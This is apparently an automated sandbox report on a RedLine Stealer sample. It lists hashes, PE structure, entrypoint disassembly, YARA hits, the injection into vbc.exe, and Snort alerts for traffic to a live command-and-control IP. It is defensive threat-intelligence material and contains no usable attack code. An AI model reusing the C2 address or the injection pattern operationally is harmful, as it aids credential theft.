                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@5/1@0/1
                                                                                                                                                  EGA Information:
                                                                                                                                                  • Successful, ratio: 50%
                                                                                                                                                  HDC Information:
                                                                                                                                                  • Successful, ratio: 90.9% (good quality ratio 87.2%)
                                                                                                                                                  • Quality average: 82.3%
                                                                                                                                                  • Quality standard deviation: 25.7%
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 99%
                                                                                                                                                  • Number of executed functions: 151
                                                                                                                                                  • Number of non-executed functions: 11
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                                  • Stop behavior analysis, all processes terminated

                                                                                                                                                  Warnings

                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe
                                                                                                                                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ctldl.windowsupdate.com
                                                                                                                                                  • Execution Graph export aborted for target vbc.exe, PID 260 because it is empty
                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                  Simulations

                                                                                                                                                  Behavior and APIs

                                                                                                                                                  TimeTypeDescription
                                                                                                                                                  16:50:51API Interceptor23x Sleep call for process: vbc.exe modified

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  193.106.191.138file.exeGet hashmaliciousBrowse
                                                                                                                                                    PXXvSes14Z.exeGet hashmaliciousBrowse
                                                                                                                                                      No3dRyTWsy.exeGet hashmaliciousBrowse
                                                                                                                                                        w8mkzbDz4A.exeGet hashmaliciousBrowse
                                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                                            file.exeGet hashmaliciousBrowse
                                                                                                                                                              file.exeGet hashmaliciousBrowse
                                                                                                                                                                file.exeGet hashmaliciousBrowse
                                                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                      file.exeGet hashmaliciousBrowse
                                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                                                            file.exeGet hashmaliciousBrowse
                                                                                                                                                                              file.exeGet hashmaliciousBrowse
                                                                                                                                                                                file.exeGet hashmaliciousBrowse
                                                                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                      file.exeGet hashmaliciousBrowse
                                                                                                                                                                                        file.exeGet hashmaliciousBrowse

                                                                                                                                                                                          Domains

                                                                                                                                                                                          No context

                                                                                                                                                                                          ASNs

                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                          BOSPOR-ASRUfile.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 193.106.191.138
                                                                                                                                                                                          PXXvSes14Z.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 193.106.191.138
                                                                                                                                                                                          eJAL1GSkQP.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 193.106.191.15
                                                                                                                                                                                          t8B2Qcl0nS.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 193.106.191.196
                                                                                                                                                                                          No3dRyTWsy.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 193.106.191.138
                                                                                                                                                                                          w8mkzbDz4A.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 193.106.191.138
                                                                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 193.106.191.138
                                                                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 193.106.191.138
                                                                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 193.106.191.138
                                                                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 193.106.191.138
                                                                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 193.106.191.138
                                                                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 193.106.191.138
                                                                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 193.106.191.138
                                                                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 193.106.191.138
                                                                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 193.106.191.138
                                                                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 193.106.191.138
                                                                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 193.106.191.138
                                                                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 193.106.191.138
                                                                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 193.106.191.138
                                                                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 193.106.191.138

                                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                                          No context

                                                                                                                                                                                          Dropped Files

                                                                                                                                                                                          No context

                                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vbc.exe.log

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):2843
                                                                                                                                                                                          Entropy (8bit):5.3371553026862095
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIWUfHKhBHKdHKBfHK5AHKzvQTHmtHoxHImHKx1qHjW:iqXeqm00YqhQnouOqLqdqNq2qzcGtIxM
                                                                                                                                                                                          MD5:E787CF7FE6F73C60B1ADCB6CFE9A2FAE
                                                                                                                                                                                          SHA1:CF44D405D677875BC3AC3A41336DA6C8F3E58277
                                                                                                                                                                                          SHA-256:6332B18367739773EAA1686C22A11DCEAD2D7314EBCEE5510F5E6A799A301203
                                                                                                                                                                                          SHA-512:8C7213E33F6A56744FAED770ECC85BFC0F9DF1EA07249CFA6FDFD1EB0822F0ADD47BB072EE21CA6442D03A1E44FE2613BFC4FFC4B72B029F33AA292A390F023B
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi

                                                                                                                                                                                          Static File Info

                                                                                                                                                                                          General

                                                                                                                                                                                          File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                          Entropy (8bit):7.344808175573031
                                                                                                                                                                                          TrID:
                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                          File name:SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe
                                                                                                                                                                                          File size:221696
                                                                                                                                                                                          MD5:34a852c0f62294480e1e6e154b00539a
                                                                                                                                                                                          SHA1:6204b0e10eaf8094da16cb5ca7c325f1dbfa97f0
                                                                                                                                                                                          SHA256:f461d11f2fac14f49aeedd66999b404cfce4138d27fe7e1da79f0aa85eee5149
                                                                                                                                                                                          SHA512:3d1edf618361a6544937b7c2e5f74bc0d7793d5eb1738ccc3a5d47cf1819efd6ca4bd4bd55d883b7826ee59c6dd6287b5a611d4d4dcdd7a788e260a2c821bea4
                                                                                                                                                                                          SSDEEP:3072:ehbc8yCxsFNcEyyrJ9WU4khLTvPZFzD0yfZNuzK/hRp1d53CDX5dINLqVqU:VCxGNp7FUyf2AhZjwINut
                                                                                                                                                                                          TLSH:F124CF1AF5621232DE6AE0F855C1CBD4603D66B2AF81400A7F2D0F7F6D3A0D7729635A
                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............v...v...v...$...v...$...v.......v...$...v.......v..ty...v...v...v.......v...$...v.......v..Rich.v..........PE..L...X..c...

                                                                                                                                                                                          File Icon

                                                                                                                                                                                          Icon Hash:00828e8e8686b000

                                                                                                                                                                                          Static PE Info

                                                                                                                                                                                          General

                                                                                                                                                                                          Entrypoint:0x406252
                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                          Subsystem:windows cui
                                                                                                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                          DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                          Time Stamp:0x63860258 [Tue Nov 29 13:00:08 2022 UTC]
                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                          OS Version Major:5
                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                          File Version Major:5
                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                          Subsystem Version Major:5
                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                          Import Hash:bcac65c952b8ab1f885fe93835602555

                                                                                                                                                                                          Entrypoint Preview

                                                                                                                                                                                          Instruction
                                                                                                                                                                                          call 00007FF934D37E1Ah
                                                                                                                                                                                          jmp 00007FF934D35A49h
                                                                                                                                                                                          mov edi, edi
                                                                                                                                                                                          push esi
                                                                                                                                                                                          push 00000001h
                                                                                                                                                                                          push 00436BA0h
                                                                                                                                                                                          mov esi, ecx
                                                                                                                                                                                          call 00007FF934D37E9Ah
                                                                                                                                                                                          mov dword ptr [esi], 00410B84h
                                                                                                                                                                                          mov eax, esi
                                                                                                                                                                                          pop esi
                                                                                                                                                                                          ret
                                                                                                                                                                                          mov dword ptr [ecx], 00410B84h
                                                                                                                                                                                          jmp 00007FF934D37EFFh
                                                                                                                                                                                          mov edi, edi
                                                                                                                                                                                          push ebp
                                                                                                                                                                                          mov ebp, esp
                                                                                                                                                                                          push esi
                                                                                                                                                                                          mov esi, ecx
                                                                                                                                                                                          mov dword ptr [esi], 00410B84h
                                                                                                                                                                                          call 00007FF934D37EECh
                                                                                                                                                                                          test byte ptr [ebp+08h], 00000001h
                                                                                                                                                                                          je 00007FF934D35BA9h
                                                                                                                                                                                          push esi
                                                                                                                                                                                          call 00007FF934D37F55h
                                                                                                                                                                                          pop ecx
                                                                                                                                                                                          mov eax, esi
                                                                                                                                                                                          pop esi
                                                                                                                                                                                          pop ebp
                                                                                                                                                                                          retn 0004h
                                                                                                                                                                                          mov edi, edi
                                                                                                                                                                                          push ebp
                                                                                                                                                                                          mov ebp, esp
                                                                                                                                                                                          push esi
                                                                                                                                                                                          push dword ptr [ebp+08h]
                                                                                                                                                                                          mov esi, ecx
                                                                                                                                                                                          call 00007FF934D37E6Bh
                                                                                                                                                                                          mov dword ptr [esi], 00410B84h
                                                                                                                                                                                          mov eax, esi
                                                                                                                                                                                          pop esi
                                                                                                                                                                                          pop ebp
                                                                                                                                                                                          retn 0004h
                                                                                                                                                                                          mov edi, edi
                                                                                                                                                                                          push ebp
                                                                                                                                                                                          mov ebp, esp
                                                                                                                                                                                          sub esp, 0Ch
                                                                                                                                                                                          jmp 00007FF934D35BAFh
                                                                                                                                                                                          push dword ptr [ebp+08h]
                                                                                                                                                                                          call 00007FF934D3818Fh
                                                                                                                                                                                          pop ecx
                                                                                                                                                                                          test eax, eax
                                                                                                                                                                                          je 00007FF934D35BB1h
                                                                                                                                                                                          push dword ptr [ebp+08h]
                                                                                                                                                                                          call 00007FF934D380A9h
                                                                                                                                                                                          pop ecx
                                                                                                                                                                                          test eax, eax
                                                                                                                                                                                          je 00007FF934D35B88h
                                                                                                                                                                                          leave
                                                                                                                                                                                          ret
                                                                                                                                                                                          test byte ptr [00437C08h], 00000001h
                                                                                                                                                                                          mov esi, 00437BFCh
                                                                                                                                                                                          jne 00007FF934D35BBBh
                                                                                                                                                                                          or dword ptr [00437C08h], 01h
                                                                                                                                                                                          mov ecx, esi
                                                                                                                                                                                          call 00007FF934D35AF9h
                                                                                                                                                                                          push 0040F8B3h
                                                                                                                                                                                          call 00007FF934D38016h
                                                                                                                                                                                          pop ecx
                                                                                                                                                                                          push esi
                                                                                                                                                                                          lea ecx, dword ptr [ebp-0Ch]
                                                                                                                                                                                          call 00007FF934D45B32h

                                                                                                                                                                                          Rich Headers

                                                                                                                                                                                          Programming Language:
                                                                                                                                                                                          • [ASM] VS2008 build 21022
                                                                                                                                                                                          • [ C ] VS2008 build 21022
                                                                                                                                                                                          • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                          • [C++] VS2008 build 21022
                                                                                                                                                                                          • [IMP] VS2005 build 50727
                                                                                                                                                                                          • [C++] VS2008 SP1 build 30729
                                                                                                                                                                                          • [RES] VS2008 build 21022
                                                                                                                                                                                          • [LNK] VS2008 SP1 build 30729

                                                                                                                                                                                          Data Directories

                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x128a40x50.rdata
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x390000x600.rsrc
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x100000x150.rdata
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                          Sections

                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                          .text0x10000xe8c70xea00False0.5349726228632479data6.652448585777237IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                          .rdata0x100000x30920x3200False0.48296875data6.068435754636973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                          .data0x140000x247d80x23c00False0.7369017701048951Alpha compressed COFF7.268563044922397IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                          .rsrc0x390000x6000x600False0.455078125data3.9776323787735532IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                          Resources

                                                                                                                                                                                          NameRVASizeTypeLanguageCountry
                                                                                                                                                                                          RT_VERSION0x392000x3fcdataEnglishUnited States
                                                                                                                                                                                          RT_MANIFEST0x390a00x15aASCII text, with CRLF line terminatorsEnglishUnited States

                                                                                                                                                                                          Imports

                                                                                                                                                                                          DLLImport
                                                                                                                                                                                          KERNEL32.dllGetLogicalDrives, CreateEventW, GetProcessHeap, QueryPerformanceFrequency, AreFileApisANSI, GetVersion, CreateFileW, GetCurrentProcess, CreateMutexW, IsProcessorFeaturePresent, FreeConsole, MultiByteToWideChar, GetModuleHandleA, GetProcAddress, GetCommandLineA, SetUnhandledExceptionFilter, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetLastError, GetEnvironmentStringsW, SetHandleCount, GetFileType, GetStartupInfoA, DeleteCriticalSection, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, HeapCreate, VirtualFree, HeapFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, HeapAlloc, RaiseException, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TerminateProcess, UnhandledExceptionFilter, IsDebuggerPresent, LeaveCriticalSection, EnterCriticalSection, LoadLibraryA, InitializeCriticalSectionAndSpinCount, VirtualAlloc, HeapReAlloc, RtlUnwind, HeapSize, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA
                                                                                                                                                                                          WINSPOOL.DRVFindFirstPrinterChangeNotification, FindClosePrinterChangeNotification, FindNextPrinterChangeNotification, WritePrinter, ScheduleJob
                                                                                                                                                                                          COMCTL32.dllImageList_Remove, ImageList_ReplaceIcon, InitCommonControlsEx, ImageList_Destroy, ImageList_Create, ImageList_SetBkColor, CreateToolbarEx

                                                                                                                                                                                          Possible Origin

                                                                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                          EnglishUnited States

                                                                                                                                                                                          Network Behavior

                                                                                                                                                                                          Snort IDS Alerts

                                                                                                                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                          192.168.2.5193.106.191.13849699327962850027 11/29/22-16:50:39.536972TCP2850027ETPRO TROJAN RedLine Stealer TCP CnC net.tcp Init4969932796192.168.2.5193.106.191.138
                                                                                                                                                                                          192.168.2.5193.106.191.13849699327962850286 11/29/22-16:51:03.828285TCP2850286ETPRO TROJAN Redline Stealer TCP CnC Activity4969932796192.168.2.5193.106.191.138
                                                                                                                                                                                          193.106.191.138192.168.2.532796496992850353 11/29/22-16:50:41.373927TCP2850353ETPRO MALWARE Redline Stealer TCP CnC - Id1Response3279649699193.106.191.138192.168.2.5

                                                                                                                                                                                          Network Port Distribution

                                                                                                                                                                                          TCP Packets

                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                          Nov 29, 2022 16:50:39.047336102 CET4969932796192.168.2.5193.106.191.138
                                                                                                                                                                                          Nov 29, 2022 16:50:39.105020046 CET3279649699193.106.191.138192.168.2.5
                                                                                                                                                                                          Nov 29, 2022 16:50:39.105655909 CET4969932796192.168.2.5193.106.191.138
                                                                                                                                                                                          Nov 29, 2022 16:50:39.536972046 CET4969932796192.168.2.5193.106.191.138
                                                                                                                                                                                          Nov 29, 2022 16:50:39.595108986 CET3279649699193.106.191.138192.168.2.5
                                                                                                                                                                                          Nov 29, 2022 16:50:39.677771091 CET4969932796192.168.2.5193.106.191.138
                                                                                                                                                                                          Nov 29, 2022 16:50:41.315479040 CET4969932796192.168.2.5193.106.191.138
                                                                                                                                                                                          Nov 29, 2022 16:50:41.373927116 CET3279649699193.106.191.138192.168.2.5
                                                                                                                                                                                          Nov 29, 2022 16:50:41.427968979 CET4969932796192.168.2.5193.106.191.138
                                                                                                                                                                                          Nov 29, 2022 16:50:48.698524952 CET4969932796192.168.2.5193.106.191.138
                                                                                                                                                                                          Nov 29, 2022 16:50:48.765489101 CET3279649699193.106.191.138192.168.2.5
                                                                                                                                                                                          Nov 29, 2022 16:50:48.765543938 CET3279649699193.106.191.138192.168.2.5
                                                                                                                                                                                          Nov 29, 2022 16:50:48.765574932 CET3279649699193.106.191.138192.168.2.5
                                                                                                                                                                                          Nov 29, 2022 16:50:48.766961098 CET4969932796192.168.2.5193.106.191.138
                                                                                                                                                                                          Nov 29, 2022 16:50:50.490920067 CET4969932796192.168.2.5193.106.191.138
                                                                                                                                                                                          Nov 29, 2022 16:50:50.550380945 CET3279649699193.106.191.138192.168.2.5
                                                                                                                                                                                          Nov 29, 2022 16:50:50.601082087 CET4969932796192.168.2.5193.106.191.138
                                                                                                                                                                                          Nov 29, 2022 16:51:01.042223930 CET4969932796192.168.2.5193.106.191.138
                                                                                                                                                                                          Nov 29, 2022 16:51:01.100651026 CET3279649699193.106.191.138192.168.2.5
                                                                                                                                                                                          Nov 29, 2022 16:51:01.179604053 CET4969932796192.168.2.5193.106.191.138
                                                                                                                                                                                          Nov 29, 2022 16:51:01.918889046 CET4969932796192.168.2.5193.106.191.138
                                                                                                                                                                                          Nov 29, 2022 16:51:01.990061998 CET3279649699193.106.191.138192.168.2.5
                                                                                                                                                                                          Nov 29, 2022 16:51:02.015486002 CET4969932796192.168.2.5193.106.191.138
                                                                                                                                                                                          Nov 29, 2022 16:51:02.073432922 CET3279649699193.106.191.138192.168.2.5
                                                                                                                                                                                          Nov 29, 2022 16:51:02.268264055 CET4969932796192.168.2.5193.106.191.138
                                                                                                                                                                                          Nov 29, 2022 16:51:02.328644037 CET3279649699193.106.191.138192.168.2.5
                                                                                                                                                                                          Nov 29, 2022 16:51:02.328670979 CET3279649699193.106.191.138192.168.2.5
                                                                                                                                                                                          Nov 29, 2022 16:51:02.328689098 CET3279649699193.106.191.138192.168.2.5
                                                                                                                                                                                          Nov 29, 2022 16:51:02.447978973 CET4969932796192.168.2.5193.106.191.138
                                                                                                                                                                                          Nov 29, 2022 16:51:02.505686045 CET3279649699193.106.191.138192.168.2.5
                                                                                                                                                                                          Nov 29, 2022 16:51:02.511476040 CET4969932796192.168.2.5193.106.191.138
                                                                                                                                                                                          Nov 29, 2022 16:51:02.569384098 CET3279649699193.106.191.138192.168.2.5
                                                                                                                                                                                          Nov 29, 2022 16:51:02.572211981 CET4969932796192.168.2.5193.106.191.138
                                                                                                                                                                                          Nov 29, 2022 16:51:02.630630016 CET3279649699193.106.191.138192.168.2.5
                                                                                                                                                                                          Nov 29, 2022 16:51:02.680166006 CET4969932796192.168.2.5193.106.191.138
                                                                                                                                                                                          Nov 29, 2022 16:51:02.772866011 CET4969932796192.168.2.5193.106.191.138
                                                                                                                                                                                          Nov 29, 2022 16:51:02.831033945 CET3279649699193.106.191.138192.168.2.5
                                                                                                                                                                                          Nov 29, 2022 16:51:02.853375912 CET4969932796192.168.2.5193.106.191.138
                                                                                                                                                                                          Nov 29, 2022 16:51:02.911556005 CET3279649699193.106.191.138192.168.2.5
                                                                                                                                                                                          Nov 29, 2022 16:51:02.976716995 CET4969932796192.168.2.5193.106.191.138
                                                                                                                                                                                          Nov 29, 2022 16:51:03.070801973 CET4969932796192.168.2.5193.106.191.138
                                                                                                                                                                                          Nov 29, 2022 16:51:03.128408909 CET3279649699193.106.191.138192.168.2.5
                                                                                                                                                                                          Nov 29, 2022 16:51:03.129113913 CET3279649699193.106.191.138192.168.2.5
                                                                                                                                                                                          Nov 29, 2022 16:51:03.159497976 CET4969932796192.168.2.5193.106.191.138
                                                                                                                                                                                          Nov 29, 2022 16:51:03.217700005 CET3279649699193.106.191.138192.168.2.5
                                                                                                                                                                                          Nov 29, 2022 16:51:03.306329966 CET4969932796192.168.2.5193.106.191.138
                                                                                                                                                                                          Nov 29, 2022 16:51:03.364243984 CET3279649699193.106.191.138192.168.2.5
                                                                                                                                                                                          Nov 29, 2022 16:51:03.476902008 CET4969932796192.168.2.5193.106.191.138
                                                                                                                                                                                          Nov 29, 2022 16:51:03.565983057 CET4969932796192.168.2.5193.106.191.138
                                                                                                                                                                                          Nov 29, 2022 16:51:03.625777960 CET3279649699193.106.191.138192.168.2.5
                                                                                                                                                                                          Nov 29, 2022 16:51:03.649928093 CET4969932796192.168.2.5193.106.191.138
                                                                                                                                                                                          Nov 29, 2022 16:51:03.707921982 CET3279649699193.106.191.138192.168.2.5
                                                                                                                                                                                          Nov 29, 2022 16:51:03.710012913 CET4969932796192.168.2.5193.106.191.138
                                                                                                                                                                                          Nov 29, 2022 16:51:03.767947912 CET3279649699193.106.191.138192.168.2.5
                                                                                                                                                                                          Nov 29, 2022 16:51:03.769047976 CET4969932796192.168.2.5193.106.191.138
                                                                                                                                                                                          Nov 29, 2022 16:51:03.826925039 CET3279649699193.106.191.138192.168.2.5
                                                                                                                                                                                          Nov 29, 2022 16:51:03.828284979 CET4969932796192.168.2.5193.106.191.138
                                                                                                                                                                                          Nov 29, 2022 16:51:03.886820078 CET3279649699193.106.191.138192.168.2.5
                                                                                                                                                                                          Nov 29, 2022 16:51:03.976751089 CET4969932796192.168.2.5193.106.191.138
                                                                                                                                                                                          Nov 29, 2022 16:51:04.092643023 CET4969932796192.168.2.5193.106.191.138

                                                                                                                                                                                          Statistics

                                                                                                                                                                                          CPU Usage

                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          Memory Usage

                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                          Behavior

                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          System Behavior

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                          Start time:16:50:17
                                                                                                                                                                                          Start date:29/11/2022
                                                                                                                                                                                          Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe
                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                          File size:221696 bytes
                                                                                                                                                                                          MD5 hash:34A852C0F62294480E1E6E154B00539A
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000003.318847444.00000000005E2000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          Reputation:low

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:1
                                                                                                                                                                                          Start time:16:50:17
                                                                                                                                                                                          Start date:29/11/2022
                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                          Imagebase:0x7ff7fcd70000
                                                                                                                                                                                          File size:625664 bytes
                                                                                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                          Start time:16:50:18
                                                                                                                                                                                          Start date:29/11/2022
                                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe
                                                                                                                                                                                          Imagebase:0x1320000
                                                                                                                                                                                          File size:2688096 bytes
                                                                                                                                                                                          MD5 hash:B3A917344F5610BEEC562556F11300FA
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
